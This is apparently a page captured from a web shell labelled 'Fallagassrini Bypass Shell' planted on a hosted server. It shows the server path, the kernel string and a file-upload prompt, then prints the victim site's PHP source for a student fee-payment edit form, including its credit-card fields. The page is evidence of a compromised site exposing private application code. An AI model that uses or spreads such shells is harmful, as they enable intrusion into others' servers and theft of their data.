? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/cocorico/application/views/student/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/cocorico/application/views/student/edit_fee_payment.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>
<script src="<?= base_url() ?>assets/scripts/jquery.autocomplete.js"></script>
<div class="row-fluid">
    <div class="tab-pane " id="tab_2">
        <div class="portlet box blue">
            <div class="portlet-title">
                <div class="caption"><i class="icon-reorder"></i>Update Fee</div>
                <div class="tools">
                    <a href="#" onclick="viewdata('student','viewinstudentsearch','search_fee_payment','view_fee','<?= $_SESSION['pagenum']; ?>')" class="remove"></a>
                </div>
            </div>
            <div class="portlet-body form">

                <?php
                $attributes = array('id'          => 'validateform', 'class'       => 'form-horizontal validate');
                echo form_open('student/addinstudent/update_fee_payment/view_fee/1', $attributes);
                $student      = $this->mastermodel->get_data_srow_joined('student', 'nationality', 'nationality_id', 'nationality_id', $viewinfo->fee_student_id, 'student_id');
                ?>

                <h3 class="form-section">Student Details</h3>
                <div class="row-fluid">
                    <div class="span6">
                        <div class="control-group">
                            <label class="control-label">Student:</label>
                            <div class="controls"><span class="text bold">
                                    <?= $student->first_name . ' ' . $student->last_name; ?></span>
                            </div>
                        </div>
                    </div>

                    <div class="span6">
                        <div class="control-group">
                            <label class="control-label">Student Reg No:</label>
                            <div class="controls"><span class="text bold"><div id="reg_no">
                                        <?= $student->reg_no; ?> </div></span>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="row-fluid">
                    <div class="span6">
                        <div class="control-group">
                            <label class="control-label">Gender:</label>
                            <div class="controls"><span class="text bold"><div  id="gender">
                                        <?= $student->gender; ?></div></span>
                            </div>
                        </div>

                    </div>

                    <div class="span6">
                        <div class="control-group">
                            <label class="control-label">Nationality:</label>
                            <div class="controls"><span class="text bold"><div id="nationality">
                                        <?= $student->nationality_name; ?></div></span>
                            </div>
                        </div>
                    </div>
                </div>





                <h3 class="form-section">Fee Details</h3>
                <div class="row-fluid">
                    <div class="span6">

                        <div class="control-group">
                            <label class="control-label">Receipt No</label>
                            <div class="controls">
                                <input type="readonly" name="receipt_no" class="span12" value="<?= $viewinfo->fee_receipt_no; ?>" /> 
                            </div>
                        </div>

                    </div>
                    <div class="span6">

                        <div class="control-group">
                            <label class="control-label">Payment Date</label>
                            <div class="controls">
                                <input value="<?= $this->mastermodel->convertdatenormalformat($viewinfo->fee_payment_date); ?>" type="text" name="fee_date" id="fee_date" class=" span12calfocus required" /> 
                            </div>
                        </div>

                    </div>
                </div>

                <div class="row-fluid">

                    <div class="span6">

                        <div class="control-group">
                            <label class="control-label">Payment Mode</label>
                            <div class="controls">
                                <select name="payment_mode" id="payment_mode" class="required  chosen span12" onchange="get_payment_mode(this.value, 'payment_mode_div','')">
                                    <?php
                                    $payment_type = $this->mastermodel->getdatas('finance_payment_types', 'payment_type_id', 'asc');
                                    foreach ($payment_type as $value)
                                    {
                                        echo '<option value="' . $value['payment_type_id'] . '"';
                                        if ($viewinfo->payment_mode == $value['payment_type_id'])
                                            echo "selected";echo' >' . $value["payment_type"] . '</option>';
                                    }
                                    ?>
                                </select>
                            </div>
                        </div>

                    </div>
                    <div class="span6">
                        <div class="control-group">
                            <label class="control-label">Remarks</label>
                            <div class="controls">
                                <textarea  name="fee_remarks" id="fee_remarks" class="span12"><?= $viewinfo->fee_payment_remarks; ?> </textarea>
                            </div>
                        </div>

                    </div>
                </div>
                <div class="portlet box blue" >

                    <div class="portlet-title">
                        <div class="caption"><i class="icon-check"></i>  Payment Details</div>
                    </div>
                    <div class="portlet-body" id='payment_mode_div'>

                        <?php
                        if ($viewinfo->payment_mode == 2)
                        {
                            $cheque = $this->mastermodel->get_data_srow('fee_payment_cheque_info', $viewinfo->fee_payment_id, 'fee_payment_id');
                            ?>

                            <table class="table table-striped table-hover table-bordered">
                                <tr>
                                    <th>Cheque Date</th>
                                    <th>Cheque No</th>
                                    <th>Cheque Info</th>
                                    <th>Bank Drawn</th>
                                </tr>
                                <tr>
                                    <td>
                                        <input class="w_90 required calfocus" type="text" name="cheque_date" id="cheque_date" value="<?= $this->mastermodel->convertdatenormalformat($cheque->cheque_date) ?>"/>
                                    </td>
                                    <td>
                                        <input class="w_90 required num_only" type="text" name="cheque_no" id="cheque_no" value="<?= $cheque->cheque_no ?>"/>
                                    </td>
                                    <td>
                                        <textarea class="required"  name="cheque_info" id="cheque_info"><?= $cheque->cheque_info ?></textarea>
                                    </td>
                                    <td>
                                        <textarea class="required"  name="bank_drawn" id="bank_drawn"><?= $cheque->bank_drawn ?></textarea>
                                    </td>                        
                                </tr>
                            </table>

                            <?php
                        }
                        else if ($viewinfo->payment_mode == 3)
                        {
                            $credit_card_info = $this->mastermodel->get_data_srow('fee_payment_credit_card_info', $viewinfo->fee_payment_id, 'fee_payment_id');
                            ?>

                            <table class="table table-striped table-hover table-bordered">
                                <tr>
                                    <th>Credit Card Holder Name</th>
                                    <th>Credit Card No</th>
                                </tr>
                                <tr>
                                    <td>
                                        <input class="required  " type="text" name="holder_name" id="holder_name" value="<?= $credit_card_info->credit_card_holder ?>"/>
                                        <div  style="padding: 0 5px;width:127px;display: block;height: 9px;">
                    <!--                        <span style="color: red;" id="cheque_no_date"></span></div>-->
                                    </td>
                                    <td>
                                        <input class="w_90 required num_only" type="text" name="card_no" id="card_no"  value="<?= $credit_card_info->credit_card_no ?>" /><br/>
                                        <div  style="color: red;padding: 0 5px;width:200px;display: block;height: 25px;">
                    <!--                        <span id="cheque_no_info"></span></div>-->
                                    </td>                
                                </tr>
                            </table>

                            <?php
                        }
                        else if ($viewinfo->payment_mode == 4)
                        {
                            $bank_transfer_info = $this->mastermodel->get_data_srow('fee_payment_bank_transfer_info', $viewinfo->fee_payment_id, 'fee_payment_id');
                            ?>

                            <table class="table table-striped table-hover table-bordered">        
                                <tr>
                                    <th>Description</th>  
                                    <td>
                                        <textarea name="bank_transfer_description" id="bank_transfer_description" style="width:250px;"><?= $bank_transfer_info->description ?></textarea>
                                    </td>

                                </tr>
                            </table>

                            <?php
                        }
                        ?>
                    </div>

                </div>
                <div class="portlet box blue" >
                    <div class="portlet-title">
                        <div class="caption"><i class="icon-check"></i> Fee Particular Details</div>
                    </div>
                    <div class="portlet-body" id='payment_mode_div'>
                        <table class="table table-striped table-hover table-bordered" id="student_tb">
                            <?php
                            $fee_particular     = $this->mastermodel->search_fee_particular();
                            $particular_list    = $this->mastermodel->get_data('fee_payment_details', $viewinfo->fee_payment_id, 'fee_payment_id');
                            ?>
                            <tr>                      
                                <th>Fee particulars</th>
                                <th>Amount</th>                                                        
                                <th><input type="button" id="button2" value="Add More" class="addRow" title="Add Row" style="width:75px;"/></th>
                            </tr>  
                            <?php
                            foreach ($particular_list as $row)
                            {
                                ?>
                                <tr>    
                                    <td>
                                        <select id="fee_particular_id" name="fee_particular_id" class="chosen valid required">
                                            <option value="">Select</option>
                                            <?php
                                            foreach ($fee_particular['results']->result_array() as $list)
                                            {
                                                echo '<option ';
                                                if ($list['fee_particular_id'] == $row['fee_particular_id'])
                                                    echo "selected "; echo' value="' . $list['fee_particular_id'] . '">' . $list['fee_particular_name'] . '</option>';
                                            }
                                            ?>
                                        </select>  
                                    </td>
                                    <td>
                                        <input type="text" value="<?= $row['fee_term_amount'] ?>" name="fee_term_amount" id="fee_term_amount" class="num_only required"/>
                                    </td>
                                    <td>
                                        <img style="float: right; vertical-align: top;"src="<?= base_url() ?>assets/img/close.png" alt="Delete Row" class="delRow clickimage" title="Delete Row"/>
                                    </td>
                                </tr>
                                <?php
                            }
                            ?>
                            <tr>    
                                <td>
                                    <select id="fee_particular_id" name="fee_particular_id" class="chosen valid required">
                                        <option value="">Select</option>
                                        <?php
                                        foreach ($fee_particular['results']->result_array() as $list)
                                        {
                                            echo '<option value="' . $list['fee_particular_id'] . '">' . $list['fee_particular_name'] . '</option>';
                                        }
                                        ?>
                                    </select>  
                                </td>
                                <td>
                                    <input type="text" name="fee_term_amount" id="fee_term_amount" class="num_only required" />
                                </td>
                                <td>
                                    <img style="float: right; vertical-align: top;"src="<?= base_url() ?>assets/img/close.png" alt="Delete Row" class="delRow clickimage" title="Delete Row"/>
                                </td>
                            </tr>
                        </table>
                    </div>
                </div>
                                        <div class="form-actions">
                    <input type="hidden" name="fee_payment_id" value="<?= $viewinfo->fee_payment_id; ?>"/>
                    <input type="hidden" name="table" value="fee"/>
                    <button type="submit" onclick="addformdata('validateform')" class="btn blue"><i class="icon-ok"></i> Save</button>
                    <button type="button" onclick="viewdata('student','viewinstudentsearch','search_fee_payment','view_fee','<?= $_SESSION['pagenum']; ?>')" class="btn">Cancel</button>
                </div>
                <?php echo form_close(); ?>
            </div>
        </div>
    </div>
</div>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net